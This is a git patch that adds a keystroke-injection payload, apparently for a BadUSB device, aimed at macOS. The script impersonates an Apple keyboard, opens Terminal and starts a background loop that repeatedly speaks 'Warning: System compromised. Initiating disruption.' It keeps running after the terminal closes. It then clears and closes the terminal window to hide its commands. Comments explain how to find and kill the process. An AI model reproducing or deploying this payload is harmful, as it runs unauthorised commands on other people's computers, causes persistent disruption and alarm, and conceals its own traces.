From 683cb69e5f159e4fc78e44899c34bc9b870b5ab9 Mon Sep 17 00:00:00 2001 From: Narstybits Date: Sun, 11 Jun 2023 23:44:01 -0500 Subject: [PATCH] added System Disruption Loop --- Executions/System Disruption Loop.txt | 34 +++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 Executions/System Disruption Loop.txt diff --git a/Executions/System Disruption Loop.txt b/Executions/System Disruption Loop.txt new file mode 100644 index 0000000..4af0904 --- /dev/null +++ b/Executions/System Disruption Loop.txt @@ -0,0 +1,34 @@ +REM This script initiates a system disruption loop by +REM continuously generating warning messages using the "say" command in macOS. +REM Will continue to run after the terminal is closed + + + +REM To end the loop you need to Kill the PID +REM In the terminal, use the command "ps aux | grep 'sh -c while true; do say "Warning: System compromised. Initiating disruption."; done' +" to find the PID of the dialog box loop +REM Run the command 'Kill PID #' to end the dialog box loop + + +REM Author: Narsty +REM Title: System Disruption Loop +REM Target: MacOS +REM Version: 1.0 +REM Category: Executions + +ID 05ac:021e Apple:Keyboard +DELAY 500 +GUI SPACE +DELAY 500 +STRING terminal +DELAY 1000 +ENTER +DELAY 1000 +STRING nohup sh -c 'while true; do say "Warning: System compromised. Initiating disruption."; done' >/dev/null 2>&1 & +DELAY 500 +GUI k +DELAY 500 +GUI w +DELAY 500 +ENTER +